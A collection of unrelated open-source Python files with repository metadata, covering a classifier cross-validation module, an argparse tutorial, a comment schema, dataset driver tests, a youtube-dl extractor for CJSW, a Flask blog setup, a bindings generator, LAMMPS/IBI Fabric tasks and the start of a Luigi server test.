krasch/smart-assistants | evaluation/experiment.py | 1 | 12058 | # -*- coding: UTF-8 -*-
"""
This module defines an evaluation framework for performing cross-validation experiments with the implemented classifiers.
"""
from datetime import datetime
from math import sqrt
from sklearn.cross_validation import KFold
from scipy import stats as scipy_stats
import pandas
import numpy
from evaluation import plot
from evaluation.metrics import QualityMetricsCalculator, runtime_metrics, quality_metrics
calculated_stats = ["Mean", "Std deviation", "Confidence interval"]
def delta_in_ms(delta):
"""
Convert a timedelta object to milliseconds.
"""
return delta.seconds*1000.0+delta.microseconds/1000.0
def confidence_interval(data, alpha=0.1):
"""
Calculate the confidence interval for each column in a pandas dataframe.
@param data: A pandas dataframe with one or several columns.
@param alpha: The confidence level, by default the 90% confidence interval is calculated.
@return: A series where each entry contains the confidence-interval for the corresponding column.
"""
alpha = 0.1
t = lambda column: scipy_stats.t.isf(alpha/2.0, len(column)-1)
width = lambda column: t(column) * numpy.std(column.values, ddof=1)/sqrt(len(column))
formatted_interval = lambda column: "%.2f +/- %.4f" % (column.mean(), width(column))
return pandas.Series([formatted_interval(data[c]) for c in data.columns], index=data.columns)
class Experiment:
"""
Class for performing cross-validation of several classifiers on one dataset.
"""
def __init__(self, dataset):
self.dataset = dataset
self.classifiers = []
def add_classifier(self, cls, name=None):
if not name is None:
cls.name = name
self.classifiers.append(cls)
def run_with_classifier(self, cls, data_for_folds):
"""
Perform cross-validation with one classifier.
@param data_for_folds: Contains one list of True/False values for each of the folds to be run. Each list states
for every item of the dataset, whether the item is in the current fold part of the training dataset or the
test dataset.
@param cls: Classifier to use in the experiment.
@return: Measurements for quality and runtime metrics.
"""
runtimes = []
quality = []
for train, test in data_for_folds:
#get the training and testing data for this fold
data_train, data_test = self.dataset.data[train], self.dataset.data[test]
target_train, target_test = self.dataset.target[train], self.dataset.target[test]
#perform training
train_time = datetime.now()
cls = cls.fit(data_train, target_train)
train_time = delta_in_ms(datetime.now()-train_time)
#apply the classifier on the test data
test_time = datetime.now()
recommendations = cls.predict(data_test)
test_time = delta_in_ms(datetime.now()-test_time)
#add measurements for this replication to result collection
runtimes.append({"Training time": train_time,
"Overall testing time": test_time,
"Individual testing time": test_time/float(len(data_test))})
quality.append(QualityMetricsCalculator(target_test, recommendations).calculate())
#calculate statistics over all replications
return self.calculate_quality_stats(cls.name, quality), self.calculate_runtime_stats(cls.name, runtimes)
def run(self, folds=10):
"""
Run the experiment with all classifiers.
@param folds: How many folds to run, perform 10-fold cross validation by default. folds must be >=2
@return A `Results` object that can be used to print and plot experiment results.
"""
assert(folds >= 2)
#divide the data into the specified number of folds
data_for_folds = KFold(len(self.dataset.data), n_folds=folds, indices=False)
#run all of the classifiers and collect quality and runtime statistics
stats = [self.run_with_classifier(cls, data_for_folds) for cls in self.classifiers]
#group all quality stats in one big matrix, all runtime stats in another matrix
quality_stats = pandas.concat([quality for quality, runtime in stats], axis=1)
runtime_stats = pandas.concat([runtime for quality, runtime in stats])
return Results(self.classifiers, quality_stats, runtime_stats)
@staticmethod
def calculate_quality_stats(cls_name, collected_measurements):
#make a big matrix of all collected measurements over all replications and group according to the cutoff
m = pandas.concat(collected_measurements)
grouped = m.groupby(m.index)
#calculate stats and rename columns to include name of the statistic and classifier,
#e.g. Precision -> (Naive Bayes, Precision, Mean)
map_column_names = lambda stat: {metric: (cls_name, metric, stat) for metric in quality_metrics}
means = grouped.mean().rename(columns=map_column_names("Mean"))
std = grouped.std().rename(columns=map_column_names("Std deviation"))
conf = grouped.apply(confidence_interval).rename(columns=map_column_names("Confidence interval"))
return pandas.concat([means, std, conf], axis=1)
@staticmethod
def calculate_runtime_stats(cls_name, collected_measurements):
#make a big matrix of all collected measurements over all replications, no need to group anything here
m = pandas.DataFrame(collected_measurements, columns=runtime_metrics)
#calculate statistics, rename columns to include name of statistic, e.g. Training time -> (Training time, Mean)
means = pandas.DataFrame(m.mean()).transpose()
means.columns = [(metric, "Mean") for metric in runtime_metrics]
std = pandas.DataFrame(m.std()).transpose()
std.columns = [(metric, "Standard deviation") for metric in runtime_metrics]
conf = pandas.DataFrame(confidence_interval(m)).transpose()
conf.columns = [(metric, "Confidence interval") for metric in runtime_metrics]
#put all individual statistics together and set name of classifier as index
combined = pandas.concat([means, std, conf], axis=1)
combined.index = [cls_name]
return combined
class Results():
"""
Class that contains the results of a cross-validation experiment. Allows to print and to plot results.
"""
def __init__(self, classifiers, quality_stats, runtime_stats):
"""
@param classifiers: The classifiers that where used in the experiment.
@param quality_stats: A pandas dataframe with 12 columns for each classifier (one column for each possible
combination of collected quality metrics and calculated statistics). The index of the dataframe is the cutoff,
i.e. how many recommendations where shown to the user.
@param runtime_stats: A pandas dataframe with 9 columns for each classifier (one column for each possible
combination of collected runtime metrics and calculated statistics). The index of the dataframe are the names of
the tested classifiers.
@return:
"""
self.classifiers = classifiers
self.quality_stats = quality_stats
self.runtime_stats = runtime_stats
def compare_quality(self, metric, statistic, cutoff_results_at=None):
"""
Grab results for given metric and statistic for all tested classifiers.
@param metric: Name of one of the quality metrics.
@param statistic: Which statistic to compare (Mean, Standard deviation, Confidence interval)
@param cutoff_results_at: At any given time only a limited number of services can be available
and can be recommended, e.g. for 10 binary sensors, 10 services are typically available. The only anomaly is
right at the beginning of the dataset, where the current status of a sensor is not known, in this case more than
10 services can be recommended. However, there will be very few instances where this is the case and
recommendation results will be therefore be statistically insignificant. If this parameter is set to any other
value than None, the output will be restricted to show only results where the cutoff for the number of
recommendations to be shown lies between 1 and this parameter.
@return: A pandas dataframe with one column for every classifier, listing the calculated statistics for the
given metric and all cutoffs..
"""
assert(statistic in calculated_stats)
assert(metric in quality_metrics)
relevant_columns = [(cls.name, metric, statistic) for cls in self.classifiers]
new_column_names = [cls.name for cls in self.classifiers]
comparison = self.quality_stats[relevant_columns]
comparison = comparison.rename(columns={old: new for old, new in zip(relevant_columns, new_column_names)})
if not cutoff_results_at is None:
comparison = comparison.loc[1: cutoff_results_at]
return comparison
def print_quality_comparison(self, metrics=quality_metrics, cutoff_results_at=None):
"""
For each of the quality metrics, print a table of confidence intervals. One column for each tested classifier
and one row for each tested recommendation cutoff.
@param cutoff_results_at: see `self.compare_quality`
@param metrics: print comparison only for these metrics
@return:
"""
for metric in metrics:
print "Results for %s" % metric
print self.compare_quality(metric, "Confidence interval", cutoff_results_at)
def print_quality_comparison_at_cutoff(self, cutoff, metrics=quality_metrics):
"""
Print one shared table of confidence intervals for all of the quality metrics. One row for each tested classifier,
one column for each calculated quality metric. Cutoff the recommendation results at `cutoff`, i.e. the user is
at most shown `cutoff` recommendations.
@param cutoff: The cutoff for which to print the results.
@param metrics: print comparison only for these metrics
@return:
"""
comparison = {metric: self.compare_quality(metric, "Confidence interval").loc[cutoff]
for metric in metrics}
comparison = pandas.DataFrame(comparison)[metrics]
print comparison
def print_runtime_comparison(self, metrics=runtime_metrics):
"""
Print one shared table of confidence intervals for all runtime metrics. One row for each tested classifier,
one column for each calculated runtime metric.
@param metrics: print comparison only for these metrics
@return:
"""
relevant_columns = [(metric, "Confidence interval") for metric in metrics]
new_column_names = [metric for metric in metrics]
comparison = self.runtime_stats[relevant_columns]
comparison = comparison.rename(columns={old: new for old, new in zip(relevant_columns, new_column_names)})
print comparison
def plot_quality_comparison(self, plot_config, cutoff_results_at=None, metrics=quality_metrics):
"""
For each of the quality metrics, generate an XY-line-plot with one line for each classifier. The X-axis is the
number of recommendations that are shown to the user, the Y-axis is the metric of interest. Uses the means of
the measurements.
@param plot_config: A function that can be called to get the full path for a plot file.
@param cutoff_results_at: see `self.compare_quality`
@param metrics: plot comparison only for these metrics
@return:
"""
for metric in metrics:
results = self.compare_quality(metric, "Mean", cutoff_results_at)
plot.plot_quality_comparison(results, metric, plot_config)
| mit | 2,074,946,014,355,926,500 | 48.826446 | 122 | 0.681705 | false | 4.499254 | true | false | false |
marcelopalin/minicurso | scripts/p01/hello_03.py | 1 | 4588 | # -*- coding: utf-8 -*-
#-------------------------------------------------------------------------------
#
# Description: Hello World!
# - vs 3 - Facilitando a execução do código passando parâmetros no momento
# da execução
#
# Author: @Palin
#
# Last Update: 10/2016
# Created: 10/2016
# Copyright: (c) Ampere Desenvolvimento 2016
#-------------------------------------------------------------------------------
# Sempre importe estes pacotes
import sys
import os
import math
# Tentando importar um pacote que PODE não estar instalado!
# Receita de Bolo! Use sempre o Try/Except
# Isso salva a vida do programador!
try:
# SOMENTE MUDE AQUI! - Coloque quantos pacotes quiser importar
import argparse
import matplotlib
except ImportError as e:
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback_details = {
'filename': exc_traceback.tb_frame.f_code.co_filename,
'lineno': exc_traceback.tb_lineno,
'name': exc_traceback.tb_frame.f_code.co_name,
'type': exc_type.__name__
}
print("#" * 80)
print("# Descrição do Erro: " + str(e))
print(traceback_details)
print("#" * 80)
sys.exit()
# ----------------------
# Sempre documente o código
# Os comentários servem depois para gerar um HTML da documentação.
# Em geral a documentação do código é gerada pelo pacote Sphinx
#
# Objetivo: pegar o nome passado pelo prompt de comando
#
# ----------------------
def main():
# recebendo os parametros
# Se nada foi alterado - vieram os parametros padrao (default)!
lstArgs = parametros_prompt()
str_nome = lstArgs.str_recebe_nome
print_debug = lstArgs.flag_imprimir
dbl_raio = lstArgs.dbl_raio
print("Olá " + str_nome + ", seja bem-vindo!")
print("Dado o raio " + str(dbl_raio) + " o comprimento da circunferência = " + str(2*math.pi))
print("Dado o raio " + str(dbl_raio) + " a área da circunferência = " + str(math.pi * dbl_raio**2 ))
if print_debug:
print("Foi definido que era para imprimir o Debug!")
##------------------------------------------------------------------------------
## @@ Inicializa o Escritor de Log
##------------------------------------------------------------------------------
def parametros_prompt():
# --------------------------------------------------------------------------
# Utiliza o pacote argparse
# Recebe os PARAMETROS DE ENTRADA passados pelo usuario na EXECUCAO do
# --------------------------------------------------------------------------
""" Objetivo:
- Capturar os parametros do prompt e retorna-los em uma lista.
:Date: 10/2016
:Version: 1.0
:Authors: @Palin
:copyright: @Marcelo Palin
"""
## parser = argparse.ArgumentParser(
## prog = 'hello_03.py',
## description = "Minicurso Aprendendo Python - XXVIII SEMAT - Versao 1.0"
## + " Este programa recebe 2 parametros de entrada no momento da execucao."
## + " S",
## epilog = 'Para consultar o Help digite: python hello_03.py -h '
## )
# String em várias linhas utilize ''' ''' para envolver.
parser = argparse.ArgumentParser(
prog = 'hello_03.py',
description = '''Minicurso Aprendendo Python - XXVIII SEMAT - Versao 1.0
Este programa recebe 3 parametros de entrada no momento da execucao.
Sao eles: O Nome da pessoa, o raio de uma circunferencia e a flag
mostrar detalhes (debug).
\n exemplo de execução:
$ python hello_03.py -debug 1 -raio 2 -nome "Marcelo Palin"
''',
epilog = 'Para consultar o Help digite: python hello_03.py -h '
)
parser.add_argument('-v', '--version', action='version', version='%(prog)s vs. 1.0')
parser.add_argument('-raio', action='store', dest='dbl_raio', type=float, default=1.0)
parser.add_argument('-debug', action='store', dest='flag_imprimir', type=int, default=0) #0 = false, 1 = true
parser.add_argument('-nome', action='store', dest='str_recebe_nome', default="Palin" )
# Pega a lista de parametros passada no prompt de comando e armazena em uma lista
# Ex de execucao: python hello_03 -debug 0 -nome "Marcelo Palin"
lstArgs = parser.parse_args()
return lstArgs
##@fim do metodo
##----------------------------------------------------------------------------
# Quando executo o codigo, qual funcao devo chamar primeiro?
if __name__ == '__main__':
main()
| mit | -4,412,214,303,823,284,000 | 34.512 | 113 | 0.546231 | false | 3.250712 | false | false | false |
liqd/adhocracy3.mercator | src/adhocracy_core/adhocracy_core/sheets/comment.py | 2 | 2330 | """Comment sheet."""
from colander import deferred
from substanced.util import find_service
from adhocracy_core.interfaces import ISheet
from adhocracy_core.interfaces import ISheetReferenceAutoUpdateMarker
from adhocracy_core.interfaces import SheetToSheet
from adhocracy_core.sheets import add_sheet_to_registry
from adhocracy_core.schema import MappingSchema
from adhocracy_core.schema import Integer
from adhocracy_core.schema import PostPool
from adhocracy_core.schema import Reference
from adhocracy_core.schema import Text
from adhocracy_core.sheets import sheet_meta
class IComment(ISheet, ISheetReferenceAutoUpdateMarker):
"""Marker interface for the comment sheet."""
class ICommentable(ISheet, ISheetReferenceAutoUpdateMarker):
"""Marker interface for resources that can be commented upon."""
class CommentRefersToReference(SheetToSheet):
"""Reference from comment version to the commented-on item version."""
source_isheet = IComment
source_isheet_field = 'refers_to'
target_isheet = ICommentable
class CommentSchema(MappingSchema):
"""Comment sheet data structure.
`content`: Text
"""
refers_to = Reference(reftype=CommentRefersToReference)
content = Text()
# TODO add post_pool validator
comment_meta = sheet_meta._replace(isheet=IComment,
schema_class=CommentSchema)
@deferred
def deferred_default_comment_count(node: MappingSchema, kw: dict) -> str:
"""Return comment_count of the current `context` resource."""
context = kw['context']
catalogs = find_service(context, 'catalogs')
return catalogs.get_index_value(context, 'comments')
class CommentableSchema(MappingSchema):
"""Commentable sheet data structure.
`post_pool`: Pool to post new :class:`adhocracy_sample.resource.IComment`.
"""
comments_count = Integer(readonly=True,
default=deferred_default_comment_count)
post_pool = PostPool(iresource_or_service_name='comments')
commentable_meta = sheet_meta._replace(
isheet=ICommentable,
schema_class=CommentableSchema,
editable=False,
creatable=False,
)
def includeme(config):
"""Register sheets."""
add_sheet_to_registry(comment_meta, config.registry)
add_sheet_to_registry(commentable_meta, config.registry)
| agpl-3.0 | -6,638,699,725,018,826,000 | 28.871795 | 78 | 0.73691 | false | 3.819672 | false | false | false |
renegelinas/mi-instrument | mi/dataset/driver/ctdav_n/auv/test/test_ctdav_n_auv_deprecated_drivers.py | 3 | 1370 | #!/usr/bin/env python
import os
import unittest
from mi.logging import log
from mi.dataset.driver.ctdav_n.auv.ctdav_n_auv_telemetered_driver import parse as parse_telemetered
from mi.dataset.driver.ctdav_n.auv.ctdav_n_auv_recovered_driver import parse as parse_recovered
from mi.dataset.driver.ctdav_n.auv.resource import RESOURCE_PATH
from mi.dataset.dataset_driver import ParticleDataHandler
__author__ = 'Rene Gelinas'
class DriverTest(unittest.TestCase):
source_file_path = os.path.join(RESOURCE_PATH, 'subset_reduced.csv')
def test_telemetered_deprecation(self):
particle_data_handler = parse_telemetered(None, self.source_file_path, ParticleDataHandler())
log.info("SAMPLES: %s", particle_data_handler._samples)
log.info("FAILURE: %s", particle_data_handler._failure)
self.assertEquals(particle_data_handler._failure, False)
def test_recovered_deprecation(self):
particle_data_handler = parse_recovered(None, self.source_file_path, ParticleDataHandler())
log.info("SAMPLES: %s", particle_data_handler._samples)
log.info("FAILURE: %s", particle_data_handler._failure)
self.assertEquals(particle_data_handler._failure, False)
if __name__ == '__main__':
test = DriverTest('deprecation_tests')
test.test_telemetered_deprecation()
test.test_recovered_deprecation()
| bsd-2-clause | 7,216,453,601,948,751,000 | 32.414634 | 101 | 0.727007 | false | 3.416459 | true | false | false |
gkoelln/youtube-dl | youtube_dl/extractor/cjsw.py | 45 | 2412 | # coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
determine_ext,
unescapeHTML,
)
class CJSWIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?cjsw\.com/program/(?P<program>[^/]+)/episode/(?P<id>\d+)'
_TESTS = [{
'url': 'http://cjsw.com/program/freshly-squeezed/episode/20170620',
'md5': 'cee14d40f1e9433632c56e3d14977120',
'info_dict': {
'id': '91d9f016-a2e7-46c5-8dcb-7cbcd7437c41',
'ext': 'mp3',
'title': 'Freshly Squeezed – Episode June 20, 2017',
'description': 'md5:c967d63366c3898a80d0c7b0ff337202',
'series': 'Freshly Squeezed',
'episode_id': '20170620',
},
}, {
# no description
'url': 'http://cjsw.com/program/road-pops/episode/20170707/',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
program, episode_id = mobj.group('program', 'id')
audio_id = '%s/%s' % (program, episode_id)
webpage = self._download_webpage(url, episode_id)
title = unescapeHTML(self._search_regex(
(r'<h1[^>]+class=["\']episode-header__title["\'][^>]*>(?P<title>[^<]+)',
r'data-audio-title=(["\'])(?P<title>(?:(?!\1).)+)\1'),
webpage, 'title', group='title'))
audio_url = self._search_regex(
r'<button[^>]+data-audio-src=(["\'])(?P<url>(?:(?!\1).)+)\1',
webpage, 'audio url', group='url')
audio_id = self._search_regex(
r'/([\da-f]{8}-[\da-f]{4}-[\da-f]{4}-[\da-f]{4}-[\da-f]{12})\.mp3',
audio_url, 'audio id', default=audio_id)
formats = [{
'url': audio_url,
'ext': determine_ext(audio_url, 'mp3'),
'vcodec': 'none',
}]
description = self._html_search_regex(
r'<p>(?P<description>.+?)</p>', webpage, 'description',
default=None)
series = self._search_regex(
r'data-showname=(["\'])(?P<name>(?:(?!\1).)+)\1', webpage,
'series', default=program, group='name')
return {
'id': audio_id,
'title': title,
'description': description,
'formats': formats,
'series': series,
'episode_id': episode_id,
}
| unlicense | -4,063,502,987,773,949,400 | 32.472222 | 95 | 0.506224 | false | 3.247978 | false | false | false |
embik/bloks | bloks/__init__.py | 1 | 1395 | import os
import logging
from logging import Formatter
from logging.handlers import RotatingFileHandler
from flask import Flask
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext.login import LoginManager
from flask.ext.pagedown import PageDown
app = Flask(__name__)
app.config.from_object('bloks.config')
# Check for various necessary configuration keys
assert 'BLOG_TITLE' in app.config, 'No BLOG_TITLE config value found'
assert 'BLOG_DESCRIPTION' in app.config, 'No BLOG_DESCRIPTION config value found'
assert 'SECRET_KEY' in app.config, 'No SECRET_KEY config value found'
assert 'LOG_PATH' in app.config, 'No LOG_PATH config value found'
# Initialize logging handler
handler = RotatingFileHandler(app.config['LOG_PATH'], maxBytes=1000, backupCount=1)
handler.setFormatter(Formatter('%(asctime)s %(levelname)s: %(message)s'))
handler.setLevel(logging.INFO)
app.logger.addHandler(handler)
# Initialize PageDown
pagedown = PageDown(app)
# Initialize SQLAlchemy database
db = SQLAlchemy(app)
# Initialize LoginManager
lm = LoginManager()
lm.init_app(app)
from . import utils
from .models import Link
app.jinja_env.globals.update(render_markdown=utils.render_markdown)
app.jinja_env.globals.update(join=os.path.join)
app.jinja_env.globals.update(link_query=Link.query.all)
from . import views, admin_views, errors, models
__all__ = ['views', 'admin_views', 'errors', 'models', ]
| mit | 4,729,526,484,337,995,000 | 32.214286 | 83 | 0.779211 | false | 3.4875 | true | false | false |
hovo1990/deviser | generator/bindings_files/BindingsFiles.py | 1 | 8465 | #!/usr/bin/env python
#
# @file CMakeFiles.py
# @brief class for generating the cmake files
# @author Frank Bergmann
# @author Sarah Keating
#
# <!--------------------------------------------------------------------------
#
# Copyright (c) 2013-2015 by the California Institute of Technology
# (California, USA), the European Bioinformatics Institute (EMBL-EBI, UK)
# and the University of Heidelberg (Germany), with support from the National
# Institutes of Health (USA) under grant R01GM070923. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
# Neither the name of the California Institute of Technology (Caltech), nor
# of the European Bioinformatics Institute (EMBL-EBI), nor of the University
# of Heidelberg, nor the names of any contributors, may be used to endorse
# or promote products derived from this software without specific prior
# written permission.
# ------------------------------------------------------------------------ -->
from util import global_variables
from . import DowncastExtensionFile
from . import DowncastNamespaceFile
from . import DowncastPackagesFile
from . import DowncastPluginsFile
from . import NativeSwigFile
from . import BaseBindingsFiles
class BindingFiles():
"""Class for all Bindings files"""
def __init__(self, pkg_object, binding, verbose=False):
# # members from object
self.package = pkg_object['name']
self.verbose = verbose
self.binding = binding
self.language = global_variables.language
self.elements = pkg_object['baseElements']
self.plugins = pkg_object['plugins']
#########################################################################
# package files
def write_downcast_extension(self):
if not global_variables.is_package:
return
name = 'local-downcast-extension-{0}'.format(self.package)
ext = DowncastExtensionFile.DowncastExtensionFile(name,
self.package,
self.binding)
if self.verbose:
print('Writing file {0}'.format(ext.fileout.filename))
ext.write_file()
ext.close_file()
def write_downcast_namespace(self):
if not global_variables.is_package:
return
name = 'local-downcast-namespaces-{0}'.format(self.package)
ext = DowncastNamespaceFile.DowncastNamespaceFile(name,
self.package,
self.binding)
if self.verbose:
print('Writing file {0}'.format(ext.fileout.filename))
ext.write_file()
ext.close_file()
def write_downcast_packages(self):
if not global_variables.is_package:
return
if self.binding == 'csharp' or self.binding == 'java':
name = 'local-packages-{0}'.format(self.package)
else:
name = 'local-downcast-packages-{0}'.format(self.package)
ext = DowncastPackagesFile.DowncastPackagesFile(name,
self.package,
self.binding,
self.elements,
self.plugins)
if self.verbose and ext.fileout:
print('Writing file {0}'.format(ext.fileout.filename))
ext.write_file()
ext.close_file()
def write_downcast_plugins(self):
if not global_variables.is_package:
return
name = 'local-downcast-plugins-{0}'.format(self.package)
ext = DowncastPluginsFile.DowncastPluginsFile(name,
self.package,
self.binding,
self.plugins)
if self.verbose and ext.fileout:
print('Writing file {0}'.format(ext.fileout.filename))
ext.write_file()
ext.close_file()
#########################################################################
# local files
def write_local(self):
if global_variables.is_package:
self.write_local_package_files()
else:
self.write_local_library_files()
def write_local_package_files(self):
if self.binding == 'csharp' or self.binding == 'java':
return
else:
name = 'local-{0}'.format(self.package)
ext = DowncastPackagesFile.DowncastPackagesFile(name,
self.package,
self.binding,
self.elements,
self.plugins,
True)
if self.verbose and ext.fileout:
print('Writing file {0}'.format(ext.fileout.filename))
ext.write_file()
ext.close_file()
def write_local_library_files(self):
base_files = BaseBindingsFiles.BaseBindingsFiles(self.elements,
self.binding, True)
base_files.write_files()
########################################################################
# write files in the swig directory
def write_swig_files(self):
if global_variables.is_package:
self.write_swig_package_files()
else:
self.write_swig_library_files()
def write_swig_package_files(self):
name = '{0}-package'.format(self.package)
ext = NativeSwigFile.NativeSwigFile(name, self.package, self.elements,
self.plugins, is_header=True)
if self.verbose and ext.fileout:
print('Writing file {0}'.format(ext.fileout.filename))
ext.write_file()
ext.close_file()
name = '{0}-package'.format(self.package)
ext = NativeSwigFile.NativeSwigFile(name, self.package, self.elements,
self.plugins, is_header=False)
if self.verbose and ext.fileout:
print('Writing file {0}'.format(ext.fileout.filename))
ext.write_file()
ext.close_file()
def write_swig_library_files(self):
base_files = BaseBindingsFiles.BaseBindingsFiles(self.elements,
'swig', True)
base_files.write_files()
########################################################################
# other library files
def write_cmake_file(self):
if global_variables.is_package:
return
base_files = BaseBindingsFiles.BaseBindingsFiles(self.elements,
self.binding, True)
base_files.write_files()
########################################################################
def write_files(self):
if self.binding != 'swig':
self.write_downcast_extension()
self.write_downcast_namespace()
self.write_downcast_packages()
self.write_downcast_plugins()
self.write_local()
else:
self.write_swig_files()
| lgpl-2.1 | 1,252,636,336,700,358,700 | 41.752525 | 78 | 0.537389 | false | 4.769014 | false | false | false |
uschille/FabSim | deploy/fabNanoMD.py | 1 | 5847 | # -*- coding: utf-8 -*-
#
# Copyright (C) University College London, 2013, all rights reserved.
#
# This file is part of FabMD and is CONFIDENTIAL. You may not work
# with, install, use, duplicate, modify, redistribute or share this
# file, or any part thereof, other than as allowed by any agreement
# specifically made by you with University College London.
#
from fab import *
@task
def lammps(config,**args):
"""Submit a LAMMPS job to the remote queue.
The job results will be stored with a name pattern as defined in the environment,
e.g. cylinder-abcd1234-legion-256
config : config directory to use to define geometry, e.g. config=cylinder
Keyword arguments:
cores : number of compute cores to request
images : number of images to take
steering : steering session i.d.
wall_time : wall-time job limit
memory : memory per node
"""
with_config(config)
execute(put_configs,config)
job(dict(script='lammps',
cores=4, wall_time='0:15:0',memory='2G'),args)
#@task
#def lammps_swelling_test(config, **args):
"""Submits a set of LAMMPS jobs to the remote queue, as part of a clay swelling test."""
#let's first try to run the exfoliated one.
#lammps_in_file =
#with_config(config)
#execute(put_configs,config)
#loop over swelling values
#update_environment(dict(job_results, job_config_path))
#job(dict(script='lammps',
#cores=4, wall_time='0:15:0',memory='2G'),args)
### IBI ###
@task
def do_ibi(number, outdir, pressure=1, config_name="peg", copy="yes", ibi_script="ibi.sh", atom_dir=os.path.join(env.localroot,'python')):
""" Copy the obtained output to a work directory, do an IBI iteration and make a new config file from the resulting data. """
ibi_in_dir = os.path.join(env.localroot,'results',outdir)
ibi_out_dir = os.path.join(env.localroot,'output_blackbox',os.path.basename(ibi_script),outdir)
local("mkdir -p %s" % (ibi_out_dir))
# if copy=="yes":
# blackbox("copy_lammps_results.sh", "%s %s %d" % (os.path.join(env.localroot,'results',outdir), os.path.join(env.localroot,'python'), int(number)))
blackbox(ibi_script, "%s %s %s %s %s" % (atom_dir, number, pressure, ibi_in_dir, ibi_out_dir))
if copy=="yes":
blackbox("prepare_lammps_config.sh", "%s %s %s %d %s" % (ibi_out_dir, os.path.join(env.localroot,'config_files'), config_name, int(number)+1, atom_dir))
@task
def ibi_analysis_multi(start_iter, num_iters, outdir_prefix, outdir_suffix, ibi_script="ibi.sh", pressure=1, atom_dir=os.path.join(env.localroot,'python')):
""" Recreate IBI analysis results based on the output files provided.
Example use: fab hector ibi_analysis_multi:start_iter=7,num_iters=3,outdir_prefix=peg_,outdir_suffix=_hector_32 """
si = int(start_iter)
ni = int(num_iters)
for i in xrange(si,si+ni):
outdir = "%s%d%s" % (outdir_prefix,i,outdir_suffix)
do_ibi(i, outdir, pressure, outdir_prefix, "no", ibi_script, atom_dir)
# ibi_in_dir = os.path.join(env.localroot,'results',outdir)
# ibi_out_dir = os.path.join(env.localroot,'ibi_output',outdir)
# local("mkdir -p %s" % (ibi_out_dir))
# blackbox("copy_lammps_results.sh", "%s %s %d" % (os.path.join(env.localroot,'results',"%s%d%s" % (outdir_prefix,i,outdir_suffix)), os.path.join(env.localroot,'python'), i))
# blackbox(ibi_script, "%s %s %s %s" % (i, pressure, ibi_in_dir, ibi_out_dir))
@task
def full_ibi(config, number, outdir, config_name, pressure=0.3, ibi_script="ibi.sh", atom_dir=os.path.join(env.localroot,'python'), **args):
""" Performs both do_ibi and runs lammps with the newly created config file.
Example use: fab hector full_ibi:config=2peg4,number=3,outdir=2peg3_hector_32,config_name=2peg,cores=32,wall_time=3:0:0 """
do_ibi(number, outdir, pressure, config_name, "yes", ibi_script, atom_dir)
lammps(config, **args)
wait_complete()
fetch_results(regex="*%s*" % (config_name))
@task
def full_ibi_multi(start_iter, num_iters, config_name, outdir_suffix, pressure=0.3, script="ibi.sh", atom_dir=os.path.join(env.localroot,'python'), **args):
""" Do multiple IBI iterations in one command.
Example use: fab hector full_ibi_multi:start_iter=7,num_iters=3,config_name=2peg,outdir_suffix=_hector_32,cores=32,wall_time=3:0:0 """
si = int(start_iter)
ni = int(num_iters)
pressure_changed = 0
for i in xrange(si,si+ni):
full_ibi("%s%d" % (config_name,i+1), i, "%s%d%s" % (config_name,i,outdir_suffix), config_name, pressure, script, atom_dir, **args)
p_ave, p_std = lammps_get_pressure(os.path.join(env.localroot,"results","%s%d%s" % (config_name,i,outdir_suffix)), i)
print "Average pressure is now", p_ave, "after iteration", i, "completed."
#if(i >= 10 and p_ave < p_std):
# if pressure_changed == 0:
# pressure = float(pressure)/3.0
# pressure_changed = 1
# print "(FabMD:) Pressure factor now set to", pressure, "after iteration", i
# if abs(p_ave) - (p_std*0.5) < 0: # We have converged, let's not waste further CPU cycles!
# print "(FabMD:) Pressure has converged. OPTIMIZATION COMPLETE"
# break
### Utitility Functions
def lammps_get_pressure(log_dir,number):
steps = []
pressures = []
LIST_IN = open(os.path.join(log_dir, "new_CG.prod%d.log" % (number)), 'r')
for line in LIST_IN:
NewRow = (line.strip()).split()
if len(NewRow) > 0:
if NewRow[0] == "Press":
pressures.append(float(NewRow[2]))
d1 = np.array(pressures[5:])
print "READ: new_CG.prod%d.log" % (number)
return np.average(d1), np.std(d1) #average and stdev
| lgpl-3.0 | -5,547,807,885,847,404,000 | 45.404762 | 181 | 0.638276 | false | 2.992323 | true | false | false |
vine/luigi | test/server_test.py | 13 | 3810 | # -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import multiprocessing
import random
import signal
import time
import tempfile
from helpers import unittest, with_config
import luigi.rpc
import luigi.server
from luigi.scheduler import CentralPlannerScheduler
from tornado.testing import AsyncHTTPTestCase
class ServerTestBase(AsyncHTTPTestCase):
def get_app(self):
return luigi.server.app(CentralPlannerScheduler())
def setUp(self):
super(ServerTestBase, self).setUp()
self._old_fetch = luigi.rpc.RemoteScheduler._fetch
def _fetch(obj, url, body, *args, **kwargs):
response = self.fetch(url, body=body, method='POST')
if response.code >= 400:
raise luigi.rpc.RPCError(
'Errror when connecting to remote scheduler'
)
return response.body.decode('utf-8')
